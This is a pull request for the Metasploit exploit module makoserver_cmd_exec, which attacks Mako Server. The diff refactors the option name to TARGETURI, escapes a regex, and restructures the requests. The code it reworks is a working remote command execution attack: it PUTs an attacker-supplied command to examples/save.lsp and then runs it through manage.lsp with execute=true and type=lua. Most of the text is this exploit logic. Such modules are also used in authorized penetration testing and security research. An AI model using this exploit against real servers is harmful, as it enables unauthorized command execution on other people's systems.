### PR TITLE
Fix #9133, makoserver_cmd_exec cleanup

### DIFF
--- a/modules/exploits/windows/http/makoserver_cmd_exec.rb
+++ b/modules/exploits/windows/http/makoserver_cmd_exec.rb
@@ -102,10 +102,6 @@ class MetasploitModule < Msf::Exploit::Remote
          'uri'      => normalize_uri(target_uri.path, 'examples/save.lsp'),
          'ctype'    => 'text/plain',
          'data'     => cmd,
-         'headers'  => {
-           'X-Requested-With' => 'XMLHttpRequest',
-           'Referer' => 'http://localhost/Lua-Types.lsp'
-         },
          'vars_get' => {
            'ex' => '2.1'
          }

--- a/modules/exploits/windows/http/makoserver_cmd_exec.rb
+++ b/modules/exploits/windows/http/makoserver_cmd_exec.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('URI', [true, 'URI path to the Mako Server app', '/'])
+        OptString.new('TARGETURI', [true, 'URI path to the Mako Server app', '/'])
       ]
     )
   end
@@ -53,17 +53,17 @@ class MetasploitModule < Msf::Exploit::Remote
     # Send GET request to determine existence of save.lsp page
     res = send_request_cgi({
              'method' => 'GET',
-             'uri'    => normalize_uri(datastore['URI'], 'examples/save.lsp')
+             'uri'    => normalize_uri(target_uri.path, 'examples/save.lsp')
            }, 20)
 
     # If response does not include "MakoServer.net", target is not viable.
-    if res.headers['Server'] !~ /MakoServer.net/
+    if res.headers['Server'] !~ /MakoServer\.net/
       vprint_warning('Target is not a Mako Server.')
       return CheckCode::Safe
     end
 
     if res.body
-      if res.body =~ /Incorrect usage/
+      if res.body.include?('Incorrect usage')
         # We are able to determine that the server has a save.lsp page and
         # returns the correct output.
         vprint_status('Mako Server save.lsp returns correct ouput.')
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown
     end
 
-    return CheckCode::Safe
+    CheckCode::Safe
   end
 
   def exploit
@@ -98,13 +98,16 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       vprint_status('Sending PUT request to save.lsp...')
       send_request_cgi({
-         'method' => 'PUT',
-         'uri'    => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'),
-         'ctype'  => 'text/plain',
-         'data'   => cmd,
-         'http'   => {
+         'method'   => 'PUT',
+         'uri'      => normalize_uri(target_uri.path, 'examples/save.lsp'),
+         'ctype'    => 'text/plain',
+         'data'     => cmd,
+         'headers'  => {
            'X-Requested-With' => 'XMLHttpRequest',
            'Referer' => 'http://localhost/Lua-Types.lsp'
+         },
+         'vars_get' => {
+           'ex' => '2.1'
          }
        }, 20)
     rescue StandardError => e
@@ -115,8 +118,13 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       vprint_status('Sending GET request to manage.lsp...')
       send_request_cgi({
-         'method' => 'GET',
-         'uri'    => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua')
+         'method'   => 'GET',
+         'uri'      => normalize_uri(target_uri.path, 'examples/manage.lsp'),
+         'vars_get' => {
+           'execute' => 'true',
+           'ex' => '2.1',
+           'type' => 'lua'
+         }
        }, 20)
     rescue StandardError => e
       fail_with(Failure::NoAccess, "Error: #{e}")


### PR DESCRIPTION
1. `TARGETURI`
2. Escape regex
3. `include?` (arguable)
4. Explicit `return` (arguable)
5. ~`http` doesn't set headers~
6. `vars_get`

@acammack-r7 @shogunlab